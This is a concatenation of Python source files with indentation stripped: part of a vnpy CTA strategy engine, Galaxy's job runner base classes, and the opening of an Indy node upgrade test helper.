self.cancel_local_stop_order(strategy, vt_orderid)
else:
self.cancel_server_order(strategy, vt_orderid)
def cancel_all(self, strategy: CtaTemplate):
"""
Cancel all active orders of a strategy.
"""
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if not vt_orderids:
return
for vt_orderid in copy(vt_orderids):
self.cancel_order(strategy, vt_orderid)
def get_engine_type(self):
""""""
return self.engine_type
def load_bar(
self,
vt_symbol: str,
days: int,
interval: Interval,
callback: Callable[[BarData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
# Query bars from RQData by default, if not found, load from database.
bars = self.query_bar_from_rq(symbol, exchange, interval, start, end)
if not bars:
bars = database_manager.load_bar_data(
symbol=symbol,
exchange=exchange,
interval=interval,
start=start,
end=end,
)
for bar in bars:
callback(bar)
def load_tick(
self,
vt_symbol: str,
days: int,
callback: Callable[[TickData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
ticks = database_manager.load_tick_data(
symbol=symbol,
exchange=exchange,
start=start,
end=end,
)
for tick in ticks:
callback(tick)
def call_strategy_func(
self, strategy: CtaTemplate, func: Callable, params: Any = None
):
"""
Call function of a strategy and catch any exception raised.
"""
try:
if params:
func(params)
else:
func()
except Exception:
strategy.trading = False
strategy.inited = False
msg = f"触发异常已停止\n{traceback.format_exc()}"
self.write_log(msg, strategy)
def add_strategy(
self, class_name: str, strategy_name: str, vt_symbol: str, setting: dict
):
"""
Add a new strategy.
"""
if strategy_name in self.strategies:
self.write_log(f"创建策略失败,存在重名{strategy_name}")
return
strategy_class = self.classes.get(class_name, None)
if not strategy_class:
self.write_log(f"创建策略失败,找不到策略类{class_name}")
return
strategy = strategy_class(self, strategy_name, vt_symbol, setting)
self.strategies[strategy_name] = strategy
# Add vt_symbol to strategy map.
strategies = self.symbol_strategy_map[vt_symbol]
strategies.append(strategy)
# Update to setting file.
self.update_strategy_setting(strategy_name, setting)
self.put_strategy_event(strategy)
def init_strategy(self, strategy_name: str):
"""
Init a strategy.
"""
self.init_queue.put(strategy_name)
if not self.init_thread:
self.init_thread = Thread(target=self._init_strategy)
self.init_thread.start()
def _init_strategy(self):
"""
Init strategies in queue.
"""
while not self.init_queue.empty():
strategy_name = self.init_queue.get()
strategy = self.strategies[strategy_name]
if strategy.inited:
self.write_log(f"{strategy_name}已经完成初始化,禁止重复操作")
continue
self.write_log(f"{strategy_name}开始执行初始化")
# Call on_init function of strategy
self.call_strategy_func(strategy, strategy.on_init)
# Restore strategy data(variables)
data = self.strategy_data.get(strategy_name, None)
if data:
for name in strategy.variables:
value = data.get(name, None)
if value:
setattr(strategy, name, value)
# Subscribe market data
contract = self.main_engine.get_contract(strategy.vt_symbol)
if contract:
req = SubscribeRequest(
symbol=contract.symbol, exchange=contract.exchange)
self.main_engine.subscribe(req, contract.gateway_name)
else:
self.write_log(f"行情订阅失败,找不到合约{strategy.vt_symbol}", strategy)
# Put event to update init completed status.
strategy.inited = True
self.put_strategy_event(strategy)
self.write_log(f"{strategy_name}初始化完成")
self.init_thread = None
def start_strategy(self, strategy_name: str):
"""
Start a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.inited:
self.write_log(f"策略{strategy.strategy_name}启动失败,请先初始化")
return
if strategy.trading:
self.write_log(f"{strategy_name}已经启动,请勿重复操作")
return
self.call_strategy_func(strategy, strategy.on_start)
strategy.trading = True
self.put_strategy_event(strategy)
def stop_strategy(self, strategy_name: str):
"""
Stop a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.trading:
return
# Call on_stop function of the strategy
self.call_strategy_func(strategy, strategy.on_stop)
# Change trading status of strategy to False
strategy.trading = False
# Cancel all orders of the strategy
self.cancel_all(strategy)
# Sync strategy variables to data file
self.sync_strategy_data(strategy)
# Update GUI
self.put_strategy_event(strategy)
def edit_strategy(self, strategy_name: str, setting: dict):
"""
Edit parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
strategy.update_setting(setting)
self.update_strategy_setting(strategy_name, setting)
self.put_strategy_event(strategy)
def remove_strategy(self, strategy_name: str):
"""
Remove a strategy.
"""
strategy = self.strategies[strategy_name]
if strategy.trading:
self.write_log(f"策略{strategy.strategy_name}移除失败,请先停止")
return
# Remove setting
self.remove_strategy_setting(strategy_name)
# Remove from symbol strategy map
strategies = self.symbol_strategy_map[strategy.vt_symbol]
strategies.remove(strategy)
# Remove from active orderid map
if strategy_name in self.strategy_orderid_map:
vt_orderids = self.strategy_orderid_map.pop(strategy_name)
# Remove vt_orderid strategy map
for vt_orderid in vt_orderids:
if vt_orderid in self.orderid_strategy_map:
self.orderid_strategy_map.pop(vt_orderid)
# Remove from strategies
self.strategies.pop(strategy_name)
return True
def load_strategy_class(self):
"""
Load strategy class from source code.
"""
path1 = Path(__file__).parent.joinpath("strategies")
self.load_strategy_class_from_folder(
path1, "vnpy.app.cta_strategy.strategies")
path2 = Path.cwd().joinpath("strategies")
self.load_strategy_class_from_folder(path2, "strategies")
def load_strategy_class_from_folder(self, path: Path, module_name: str = ""):
"""
Load strategy class from certain folder.
"""
for dirpath, dirnames, filenames in os.walk(str(path)):
for filename in filenames:
if filename.endswith(".py"):
strategy_module_name = ".".join(
[module_name, filename.replace(".py", "")])
self.load_strategy_class_from_module(strategy_module_name)
def load_strategy_class_from_module(self, module_name: str):
"""
Load strategy class from module file.
"""
try:
module = importlib.import_module(module_name)
for name in dir(module):
value = getattr(module, name)
if (isinstance(value, type) and issubclass(value, CtaTemplate) and value is not CtaTemplate):
self.classes[value.__name__] = value
except: # noqa
msg = f"策略文件{module_name}加载失败,触发异常:\n{traceback.format_exc()}"
self.write_log(msg)
def load_strategy_data(self):
"""
Load strategy data from json file.
"""
self.strategy_data = load_json(self.data_filename)
def sync_strategy_data(self, strategy: CtaTemplate):
"""
Sync strategy data into json file.
"""
data = strategy.get_variables()
data.pop("inited") # Strategy status (inited, trading) should not be synced.
data.pop("trading")
self.strategy_data[strategy.strategy_name] = data
save_json(self.data_filename, self.strategy_data)
def get_all_strategy_class_names(self):
"""
Return names of strategy classes loaded.
"""
return list(self.classes.keys())
def get_strategy_class_parameters(self, class_name: str):
"""
Get default parameters of a strategy class.
"""
strategy_class = self.classes[class_name]
parameters = {}
for name in strategy_class.parameters:
parameters[name] = getattr(strategy_class, name)
return parameters
def get_strategy_parameters(self, strategy_name):
"""
Get parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
return strategy.get_parameters()
def init_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.init_strategy(strategy_name)
def start_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.start_strategy(strategy_name)
def stop_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.stop_strategy(strategy_name)
def load_strategy_setting(self):
"""
Load setting file.
"""
self.strategy_setting = load_json(self.setting_filename)
for strategy_name, strategy_config in self.strategy_setting.items():
self.add_strategy(
strategy_config["class_name"],
strategy_name,
strategy_config["vt_symbol"],
strategy_config["setting"]
)
def update_strategy_setting(self, strategy_name: str, setting: dict):
"""
Update setting file.
"""
strategy = self.strategies[strategy_name]
self.strategy_setting[strategy_name] = {
"class_name": strategy.__class__.__name__,
"vt_symbol": strategy.vt_symbol,
"setting": setting,
}
save_json(self.setting_filename, self.strategy_setting)
def remove_strategy_setting(self, strategy_name: str):
"""
Update setting file.
"""
if strategy_name not in self.strategy_setting:
return
self.strategy_setting.pop(strategy_name)
save_json(self.setting_filename, self.strategy_setting)
def put_stop_order_event(self, stop_order: StopOrder):
"""
Put an event to update stop order status.
"""
event = Event(EVENT_CTA_STOPORDER, stop_order)
self.event_engine.put(event)
def put_strategy_event(self, strategy: CtaTemplate):
"""
Put an event to update strategy status.
"""
data = strategy.get_data()
event = Event(EVENT_CTA_STRATEGY, data)
self.event_engine.put(event)
def write_log(self, msg: str, strategy: CtaTemplate = None):
"""
Create cta engine log event.
"""
if strategy:
msg = f"{strategy.strategy_name}: {msg}"
log = LogData(msg=msg, gateway_name="CtaStrategy")
event = Event(type=EVENT_CTA_LOG, data=log)
self.event_engine.put(event)
def send_email(self, msg: str, strategy: CtaTemplate = None):
"""
Send email to default receiver.
"""
if strategy:
subject = f"{strategy.strategy_name}"
else:
subject = "CTA策略引擎"
self.main_engine.send_email(subject, msg)
|
__init__.py | """
Base classes for job runner plugins.
"""
import os
import time
import string
import logging
import datetime
import threading
import subprocess
from Queue import Queue, Empty
import galaxy.jobs
from galaxy.jobs.command_factory import build_command
from galaxy import model
from galaxy.util import DATABASE_MAX_STRING_SIZE, shrink_stream_by_size
from galaxy.util import in_directory
from galaxy.util import ParamsWithSpecs
from galaxy.util import ExecutionTimer
from galaxy.util.bunch import Bunch
from galaxy.jobs.runners.util.job_script import write_script
from galaxy.jobs.runners.util.job_script import job_script
from galaxy.jobs.runners.util.env import env_to_statement
from .state_handler_factory import build_state_handlers
log = logging.getLogger( __name__ )
STOP_SIGNAL = object()
JOB_RUNNER_PARAMETER_UNKNOWN_MESSAGE = "Invalid job runner parameter for this plugin: %s"
JOB_RUNNER_PARAMETER_MAP_PROBLEM_MESSAGE = "Job runner parameter '%s' value '%s' could not be converted to the correct type"
JOB_RUNNER_PARAMETER_VALIDATION_FAILED_MESSAGE = "Job runner parameter %s failed validation"
GALAXY_LIB_ADJUST_TEMPLATE = """GALAXY_LIB="%s"; if [ "$GALAXY_LIB" != "None" ]; then if [ -n "$PYTHONPATH" ]; then PYTHONPATH="$GALAXY_LIB:$PYTHONPATH"; else PYTHONPATH="$GALAXY_LIB"; fi; export PYTHONPATH; fi;"""
GALAXY_VENV_TEMPLATE = """GALAXY_VIRTUAL_ENV="%s"; if [ "$GALAXY_VIRTUAL_ENV" != "None" -a -z "$VIRTUAL_ENV" -a -f "$GALAXY_VIRTUAL_ENV/bin/activate" ]; then . "$GALAXY_VIRTUAL_ENV/bin/activate"; fi;"""
class RunnerParams( ParamsWithSpecs ):
def _param_unknown_error( self, name ):
raise Exception( JOB_RUNNER_PARAMETER_UNKNOWN_MESSAGE % name )
def _param_map_error( self, name, value ):
raise Exception( JOB_RUNNER_PARAMETER_MAP_PROBLEM_MESSAGE % ( name, value ) )
def _param_vaildation_error( self, name, value ):
raise Exception( JOB_RUNNER_PARAMETER_VALIDATION_FAILED_MESSAGE % name )
class BaseJobRunner( object ):
DEFAULT_SPECS = dict( recheck_missing_job_retries=dict( map=int, valid=lambda x: x >= 0, default=0 ) )
def __init__( self, app, nworkers, **kwargs ):
"""Start the job runner
"""
self.app = app
self.sa_session = app.model.context
self.nworkers = nworkers
runner_param_specs = self.DEFAULT_SPECS.copy()
if 'runner_param_specs' in kwargs:
runner_param_specs.update( kwargs.pop( 'runner_param_specs' ) )
if kwargs:
log.debug( 'Loading %s with params: %s', self.runner_name, kwargs )
self.runner_params = RunnerParams( specs=runner_param_specs, params=kwargs )
self.runner_state_handlers = build_state_handlers()
def _init_worker_threads(self):
"""Start ``nworkers`` worker threads.
"""
self.work_queue = Queue()
self.work_threads = []
log.debug('Starting %s %s workers' % (self.nworkers, self.runner_name))
for i in range(self.nworkers):
worker = threading.Thread( name="%s.work_thread-%d" % (self.runner_name, i), target=self.run_next )
worker.setDaemon( True )
worker.start()
self.work_threads.append( worker )
def run_next(self):
"""Run the next item in the work queue (a job waiting to run)
"""
while True:
( method, arg ) = self.work_queue.get()
if method is STOP_SIGNAL:
return
# id and name are collected first so that the call of method() is the last exception.
try:
if isinstance(arg, AsynchronousJobState):
job_id = arg.job_wrapper.get_id_tag()
else:
# arg should be a JobWrapper/TaskWrapper
job_id = arg.get_id_tag()
except:
job_id = 'unknown'
try:
name = method.__name__
except:
name = 'unknown'
try:
method(arg)
except:
log.exception( "(%s) Unhandled exception calling %s" % ( job_id, name ) )
# Causes a runner's `queue_job` method to be called from a worker thread
def put(self, job_wrapper):
"""Add a job to the queue (by job identifier), indicate that the job is ready to run.
"""
put_timer = ExecutionTimer()
job = job_wrapper.get_job()
# Change to queued state before handing to worker thread so the runner won't pick it up again
job_wrapper.change_state( model.Job.states.QUEUED, flush=False, job=job )
# Persist the destination so that the job will be included in counts if using concurrency limits
job_wrapper.set_job_destination( job_wrapper.job_destination, None, flush=False, job=job )
self.sa_session.flush()
self.mark_as_queued(job_wrapper)
log.debug("Job [%s] queued %s" % (job_wrapper.job_id, put_timer))
def mark_as_queued(self, job_wrapper):
self.work_queue.put( ( self.queue_job, job_wrapper ) )
def shutdown( self ):
"""Attempts to gracefully shut down the worker threads
"""
log.info( "%s: Sending stop signal to %s worker threads" % ( self.runner_name, len( self.work_threads ) ) )
for i in range( len( self.work_threads ) ):
self.work_queue.put( ( STOP_SIGNAL, None ) )
# Most runners should override the legacy URL handler methods and destination param method
def url_to_destination(self, url):
"""
Convert a legacy URL to a JobDestination.
Job runner URLs are deprecated, JobDestinations should be used instead.
This base class method converts from a URL to a very basic
JobDestination without destination params.
"""
return galaxy.jobs.JobDestination(runner=url.split(':')[0])
def parse_destination_params(self, params):
"""Parse the JobDestination ``params`` dict and return the runner's native representation of those params.
"""
raise NotImplementedError()
def prepare_job(self, job_wrapper, include_metadata=False, include_work_dir_outputs=True,
modify_command_for_container=True):
"""Some sanity checks that all runners' queue_job() methods are likely to want to do
"""
job_id = job_wrapper.get_id_tag()
job_state = job_wrapper.get_state()
job_wrapper.is_ready = False
job_wrapper.runner_command_line = None
# Make sure the job hasn't been deleted
if job_state == model.Job.states.DELETED:
log.debug( "(%s) Job deleted by user before it entered the %s queue" % ( job_id, self.runner_name ) )
if self.app.config.cleanup_job in ( "always", "onsuccess" ):
job_wrapper.cleanup()
return False
elif job_state != model.Job.states.QUEUED:
log.info( "(%s) Job is in state %s, skipping execution" % ( job_id, job_state ) )
# cleanup may not be safe in all states
return False
# Prepare the job
try:
job_wrapper.prepare()
job_wrapper.runner_command_line = self.build_command_line(
job_wrapper,
include_metadata=include_metadata,
include_work_dir_outputs=include_work_dir_outputs,
modify_command_for_container=modify_command_for_container
)
except Exception as e:
log.exception("(%s) Failure preparing job" % job_id)
job_wrapper.fail( e.message if hasattr( e, 'message' ) else "Job preparation failed", exception=True )
return False
if not job_wrapper.runner_command_line:
job_wrapper.finish( '', '' )
return False
return True
# Runners must override the job handling methods
def queue_job(self, job_wrapper):
raise NotImplementedError()
def stop_job(self, job):
raise NotImplementedError()
def recover(self, job, job_wrapper):
raise NotImplementedError()
def build_command_line( self, job_wrapper, include_metadata=False, include_work_dir_outputs=True,
modify_command_for_container=True ):
container = self._find_container( job_wrapper )
if not container and job_wrapper.requires_containerization:
raise Exception("Failed to find a container when required, contact Galaxy admin.")
return build_command(
self,
job_wrapper,
include_metadata=include_metadata,
include_work_dir_outputs=include_work_dir_outputs,
modify_command_for_container=modify_command_for_container,
container=container
)
def get_work_dir_outputs( self, job_wrapper, job_working_directory=None, tool_working_directory=None ):
"""
Returns list of pairs (source_file, destination) describing path
to work_dir output file and ultimate destination.
"""
if tool_working_directory is not None and job_working_directory is not None:
raise Exception("get_work_dir_outputs called with both a job and tool working directory, only one may be specified")
if tool_working_directory is None:
if not job_working_directory:
job_working_directory = os.path.abspath( job_wrapper.working_directory )
tool_working_directory = os.path.join(job_working_directory, "working")
# Set up dict of dataset id --> output path; output path can be real or
# false depending on outputs_to_working_directory
output_paths = {}
for dataset_path in job_wrapper.get_output_fnames():
path = dataset_path.real_path
if self.app.config.outputs_to_working_directory:
path = dataset_path.false_path
output_paths[ dataset_path.dataset_id ] = path
output_pairs = []
# Walk job's output associations to find and use from_work_dir attributes.
job = job_wrapper.get_job()
job_tool = job_wrapper.tool
for (joda, dataset) in self._walk_dataset_outputs( job ):
if joda and job_tool:
hda_tool_output = job_tool.find_output_def( joda.name )
if hda_tool_output and hda_tool_output.from_work_dir:
# Copy from working dir to HDA.
# TODO: move instead of copy to save time?
source_file = os.path.join( tool_working_directory, hda_tool_output.from_work_dir )
destination = job_wrapper.get_output_destination( output_paths[ dataset.dataset_id ] )
if in_directory( source_file, tool_working_directory ):
output_pairs.append( ( source_file, destination ) )
else:
# Security violation.
log.exception( "from_work_dir specified a location not in the working directory: %s, %s" % ( source_file, job_wrapper.working_directory ) )
return output_pairs
def _walk_dataset_outputs( self, job ):
for dataset_assoc in job.output_datasets + job.output_library_datasets:
for dataset in dataset_assoc.dataset.dataset.history_associations + dataset_assoc.dataset.dataset.library_associations:
if isinstance( dataset, self.app.model.HistoryDatasetAssociation ):
joda = self.sa_session.query( self.app.model.JobToOutputDatasetAssociation ).filter_by( job=job, dataset=dataset ).first()
yield (joda, dataset)
# TODO: why is this not just something easy like:
# for dataset_assoc in job.output_datasets + job.output_library_datasets:
# yield (dataset_assoc, dataset_assoc.dataset)
# I don't understand the reworking it backwards. -John
def _handle_metadata_externally( self, job_wrapper, resolve_requirements=False ):
"""
Set metadata externally. Used by the Pulsar job runner where this
shouldn't be attached to command line to execute.
"""
# run the metadata setting script here
# this is terminate-able when output dataset/job is deleted
# so that long running set_meta()s can be canceled without having to reboot the server
if job_wrapper.get_state() not in [ model.Job.states.ERROR, model.Job.states.DELETED ] and job_wrapper.output_paths:
lib_adjust = GALAXY_LIB_ADJUST_TEMPLATE % job_wrapper.galaxy_lib_dir
venv = GALAXY_VENV_TEMPLATE % job_wrapper.galaxy_virtual_env
external_metadata_script = job_wrapper.setup_external_metadata( output_fnames=job_wrapper.get_output_fnames(),
set_extension=True,
tmp_dir=job_wrapper.working_directory,
# We don't want to overwrite metadata that was copied over in init_meta(), as per established behavior
kwds={ 'overwrite' : False } )
external_metadata_script = "%s %s %s" % (lib_adjust, venv, external_metadata_script)
if resolve_requirements:
dependency_shell_commands = self.app.datatypes_registry.set_external_metadata_tool.build_dependency_shell_commands(job_directory=job_wrapper.working_directory)
if dependency_shell_commands:
if isinstance( dependency_shell_commands, list ):
dependency_shell_commands = "&&".join( dependency_shell_commands )
external_metadata_script = "%s&&%s" % ( dependency_shell_commands, external_metadata_script )
log.debug( 'executing external set_meta script for job %d: %s' % ( job_wrapper.job_id, external_metadata_script ) )
external_metadata_proc = subprocess.Popen( args=external_metadata_script,
shell=True,
cwd=job_wrapper.working_directory,
env=os.environ,
preexec_fn=os.setpgrp )
job_wrapper.external_output_metadata.set_job_runner_external_pid( external_metadata_proc.pid, self.sa_session )
external_metadata_proc.wait()
log.debug( 'execution of external set_meta for job %d finished' % job_wrapper.job_id )
def get_job_file(self, job_wrapper, **kwds):
job_metrics = job_wrapper.app.job_metrics
job_instrumenter = job_metrics.job_instrumenters[ job_wrapper.job_destination.id ]
env_setup_commands = kwds.get( 'env_setup_commands', [] )
env_setup_commands.append( job_wrapper.get_env_setup_clause() or '' )
destination = job_wrapper.job_destination or {}
envs = destination.get( "env", [] )
envs.extend( job_wrapper.environment_variables )
for env in envs:
env_setup_commands.append( env_to_statement( env ) )
command_line = job_wrapper.runner_command_line
options = dict(
job_instrumenter=job_instrumenter,
galaxy_lib=job_wrapper.galaxy_lib_dir,
galaxy_virtual_env=job_wrapper.galaxy_virtual_env,
env_setup_commands=env_setup_commands,
working_directory=os.path.abspath( job_wrapper.working_directory ),
command=command_line,
shell=job_wrapper.shell,
preserve_python_environment=job_wrapper.tool.requires_galaxy_python_environment,
)
# Additional logging to enable if debugging from_work_dir handling, metadata
# commands, etc... (or just peak in the job script.)
job_id = job_wrapper.job_id
log.debug( '(%s) command is: %s' % ( job_id, command_line ) )
options.update(**kwds)
return job_script(**options)
def write_executable_script( self, path, contents, mode=0o755 ):
write_script( path, contents, self.app.config, mode=mode )
def _find_container(
self,
job_wrapper,
compute_working_directory=None,
compute_tool_directory=None,
compute_job_directory=None,
):
job_directory_type = "galaxy" if compute_working_directory is None else "pulsar"
if not compute_working_directory:
compute_working_directory = job_wrapper.tool_working_directory
if not compute_job_directory:
compute_job_directory = job_wrapper.working_directory
if not compute_tool_directory:
compute_tool_directory = job_wrapper.tool.tool_dir
tool = job_wrapper.tool
from galaxy.tools.deps import containers
tool_info = containers.ToolInfo(tool.containers, tool.requirements)
job_info = containers.JobInfo(
compute_working_directory,
compute_tool_directory,
compute_job_directory,
job_directory_type,
)
destination_info = job_wrapper.job_destination.params
return self.app.container_finder.find_container(
tool_info,
destination_info,
job_info
)
def _handle_runner_state( self, runner_state, job_state ):
try:
for handler in self.runner_state_handlers.get(runner_state, []):
handler(self.app, self, job_state)
if job_state.runner_state_handled:
break
except:
log.exception('Caught exception in runner state handler:')
def fail_job( self, job_state, exception=False ):
if getattr( job_state, 'stop_job', True ):
self.stop_job( self.sa_session.query( self.app.model.Job ).get( job_state.job_wrapper.job_id ) )
self._handle_runner_state( 'failure', job_state )
# Not convinced this is the best way to indicate this state, but
# something necessary
if not job_state.runner_state_handled:
job_state.job_wrapper.fail( getattr( job_state, 'fail_message', 'Job failed' ), exception=exception )
if job_state.job_wrapper.cleanup_job == "always":
job_state.cleanup()
def mark_as_resubmitted( self, job_state, info=None ):
job_state.job_wrapper.mark_as_resubmitted( info=info )
if not self.app.config.track_jobs_in_database:
job_state.job_wrapper.change_state( model.Job.states.QUEUED )
self.app.job_manager.job_handler.dispatcher.put( job_state.job_wrapper )
class JobState( object ):
"""
Encapsulate state of jobs.
"""
runner_states = Bunch(
WALLTIME_REACHED='walltime_reached',
MEMORY_LIMIT_REACHED='memory_limit_reached',
UNKNOWN_ERROR='unknown_error',
GLOBAL_WALLTIME_REACHED='global_walltime_reached',
OUTPUT_SIZE_LIMIT='output_size_limit'
)
def __init__( self, job_wrapper, job_destination ):
self.runner_state_handled = False
self.job_wrapper = job_wrapper
self.job_destination = job_destination
def set_defaults( self, files_dir ):
if self.job_wrapper is not None:
id_tag = self.job_wrapper.get_id_tag()
if files_dir is not None:
self.job_file = JobState.default_job_file( files_dir, id_tag )
self.output_file = os.path.join( files_dir, 'galaxy_%s.o' % id_tag )
self.error_file = os.path.join( files_dir, 'galaxy_%s.e' % id_tag )
self.exit_code_file = os.path.join( files_dir, 'galaxy_%s.ec' % id_tag )
job_name = 'g%s' % id_tag
if self.job_wrapper.tool.old_id:
job_name += '_%s' % self.job_wrapper.tool.old_id
if self.job_wrapper.user:
job_name += '_%s' % self.job_wrapper.user
self.job_name = ''.join( map( lambda x: x if x in ( string.letters + string.digits + '_' ) else '_', job_name ) )
@staticmethod
def default_job_file( files_dir, id_tag ):
return os.path.join( files_dir, 'galaxy_%s.sh' % id_tag )
@staticmethod
def default_exit_code_file( files_dir, id_tag ):
return os.path.join( files_dir, 'galaxy_%s.ec' % id_tag )
class AsynchronousJobState( JobState ):
"""
Encapsulate the state of an asynchronous job, this should be subclassed as
needed for various job runners to capture additional information needed
to communicate with distributed resource manager.
"""
def __init__( self, files_dir=None, job_wrapper=None, job_id=None, job_file=None, output_file=None, error_file=None, exit_code_file=None, job_name=None, job_destination=None ):
super( AsynchronousJobState, self ).__init__( job_wrapper, job_destination )
self.old_state = None
self._running = False
self.check_count = 0
self.start_time = None
# job_id is the DRM's job id, not the Galaxy job id
self.job_id = job_id
self.job_file = job_file
self.output_file = output_file
self.error_file = error_file
self.exit_code_file = exit_code_file
self.job_name = job_name
self.set_defaults( files_dir )
self.cleanup_file_attributes = [ 'job_file', 'output_file', 'error_file', 'exit_code_file' ]
@property
def running( self ):
return self._running
@running.setter
def running( self, is_running ):
self._running = is_running
# This will be invalid for job recovery
if self.start_time is None:
self.start_time = datetime.datetime.now()
def check_limits( self, runtime=None ):
limit_state = None
if self.job_wrapper.has_limits():
self.check_count += 1
if self.running and (self.check_count % 20 == 0):
if runtime is None:
runtime = datetime.datetime.now() - (self.start_time or datetime.datetime.now())
self.check_count = 0
limit_state = self.job_wrapper.check_limits( runtime=runtime )
if limit_state is not None:
# Set up the job for failure, but the runner will do the actual work
self.runner_state, self.fail_message = limit_state
self.stop_job = True
return True
return False
def cleanup( self ):
for file in [ getattr( self, a ) for a in self.cleanup_file_attributes if hasattr( self, a ) ]:
try:
os.unlink( file )
except Exception as e:
log.debug( "(%s/%s) Unable to cleanup %s: %s" % ( self.job_wrapper.get_id_tag(), self.job_id, file, str( e ) ) )
def register_cleanup_file_attribute( self, attribute ):
if attribute not in self.cleanup_file_attributes:
self.cleanup_file_attributes.append( attribute )
class AsynchronousJobRunner( BaseJobRunner ):
"""Parent class for any job runner that runs jobs asynchronously (e.g. via
a distributed resource manager). Provides general methods for having a
thread to monitor the state of asynchronous jobs and submitting those jobs
to the correct methods (queue, finish, cleanup) at appropriate times..
"""
def __init__( self, app, nworkers, **kwargs ):
super( AsynchronousJobRunner, self ).__init__( app, nworkers, **kwargs )
# 'watched' and 'queue' are both used to keep track of jobs to watch.
# 'queue' is used to add new watched jobs, and can be called from
# any thread (usually by the 'queue_job' method). 'watched' must only
# be modified by the monitor thread, which will move items from 'queue'
# to 'watched' and then manage the watched jobs.
self.watched = []
self.monitor_queue = Queue()
def _init_monitor_thread(self):
self.monitor_thread = threading.Thread( name="%s.monitor_thread" % self.runner_name, target=self.monitor )
self.monitor_thread.setDaemon( True )
self.monitor_thread.start()
def handle_stop(self):
# DRMAA and SGE runners should override this and disconnect.
pass
def monitor( self ):
"""
Watches jobs currently in the monitor queue and deals with state
changes (queued to running) and job completion.
"""
while True:
# Take any new watched jobs and put them on the monitor list
try:
while True:
async_job_state = self.monitor_queue.get_nowait()
if async_job_state is STOP_SIGNAL:
# TODO: This is where any cleanup would occur
self.handle_stop()
return
self.watched.append( async_job_state )
except Empty:
pass
# Iterate over the list of watched jobs and check state
try:
self.check_watched_items()
except Exception:
log.exception('Unhandled exception checking active jobs')
# Sleep a bit before the next state check
time.sleep( 1 )
def monitor_job(self, job_state):
self.monitor_queue.put( job_state )
def shutdown( self ):
"""Attempts to gracefully shut down the monitor thread"""
log.info( "%s: Sending stop signal to monitor thread" % self.runner_name )
self.monitor_queue.put( STOP_SIGNAL )
# Call the parent's shutdown method to stop workers
super( AsynchronousJobRunner, self ).shutdown()
def check_watched_items(self):
"""
This method is responsible for iterating over self.watched and handling
state changes and updating self.watched with a new list of watched job
states. Subclasses can opt to override this directly (as older job runners will
initially) or just override check_watched_item and allow the list processing to
reuse the logic here.
"""
new_watched = []
for async_job_state in self.watched:
new_async_job_state = self.check_watched_item(async_job_state)
if new_async_job_state:
new_watched.append(new_async_job_state)
self.watched = new_watched
# Subclasses should implement this unless they override check_watched_items all together.
def check_watched_item(self, job_state):
raise NotImplementedError()
def finish_job( self, job_state ):
"""
Get the output/error for a finished job, pass to `job_wrapper.finish`
and cleanup all the job's temporary files.
"""
galaxy_id_tag = job_state.job_wrapper.get_id_tag()
external_job_id = job_state.job_id
# To ensure that files below are readable, ownership must be reclaimed first
job_state.job_wrapper.reclaim_ownership()
# wait for the files to appear
which_try = 0
while which_try < (self.app.config.retry_job_output_collection + 1):
try:
stdout = shrink_stream_by_size( open( job_state.output_file, "r" ), DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
stderr = shrink_stream_by_size( open( job_state.error_file, "r" ), DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
which_try = (self.app.config.retry_job_output_collection + 1)
except Exception as e:
if which_try == self.app.config.retry_job_output_collection:
stdout = ''
stderr = 'Job output not returned from cluster'
log.error( '(%s/%s) %s: %s' % ( galaxy_id_tag, external_job_id, stderr, str( e ) ) )
else:
time.sleep(1)
which_try += 1
try:
# This should be an 8-bit exit code, but read ahead anyway:
exit_code_str = open( job_state.exit_code_file, "r" ).read(32)
except:
# By default, the exit code is 0, which typically indicates success.
exit_code_str = "0"
try:
# Decode the exit code. If it's bogus, then just use 0.
exit_code = int(exit_code_str)
except:
log.warning( "(%s/%s) Exit code '%s' invalid. Using 0." % ( galaxy_id_tag, external_job_id, exit_code_str ) )
exit_code = 0
# clean up the job files
cleanup_job = job_state.job_wrapper.cleanup_job
if cleanup_job == "always" or ( not stderr and cleanup_job == "onsuccess" ):
job_state.cleanup()
try:
job_state.job_wrapper.finish( stdout, stderr, exit_code )
except:
log.exception( "(%s/%s) Job wrapper finish method failed" % ( galaxy_id_tag, external_job_id ) )
job_state.job_wrapper.fail( "Unable to finish job", exception=True )
def mark_as_finished(self, job_state):
self.work_queue.put( ( self.finish_job, job_state ) )
def mark_as_failed(self, job_state):
self.work_queue.put( ( self.fail_job, job_state ) )
|
helper.py | import functools
import json
import multiprocessing
import os
import socket
import subprocess
from datetime import datetime
from typing import List, Tuple
import base58
import dateutil.tz
from plenum.bls.bls_crypto_factory import create_default_bls_crypto_factory
from plenum.test.node_catchup.helper import waitNodeDataEquality, ensure_all_nodes_have_same_data
from plenum.common.keygen_utils import init_bls_keys
from indy.ledger import build_pool_upgrade_request
from plenum.common.constants import DATA, VERSION, FORCE
from plenum.common.txn_util import get_type, get_payload_data, get_from
from plenum.common.util import randomString, hexToFriendly
from plenum.test import waits as plenumWaits
from plenum.test.helper import sdk_get_and_check_replies
from plenum.test.pool_transactions.helper import sdk_sign_and_send_prepared_request, sdk_send_update_node, \
sdk_pool_refresh, sdk_add_new_nym
from stp_core.common.log import getlogger
from stp_core.loop.eventually import eventually
from indy_common.constants import NODE_UPGRADE, ACTION, \
UPGRADE_MESSAGE, MESSAGE_TYPE, APP_NAME
from indy_common.config import controlServiceHost, controlServicePort
import indy_node
from indy_node.server.upgrade_log import UpgradeLogData, UpgradeLog
from indy_node.server.upgrader import Upgrader
from indy_node.test.helper import TestNode
from indy_node.utils.node_control_tool import NodeControlTool
from indy_common.config_helper import NodeConfigHelper
logger = getlogger()
class TestNodeNoProtocolVersion(TestNode):
def processNodeRequest(self, request, frm):
if request.protocolVersion is not None:
raise ValueError('Do not understand what protocolVersion is!!!')
super().processNodeRequest(request, frm)
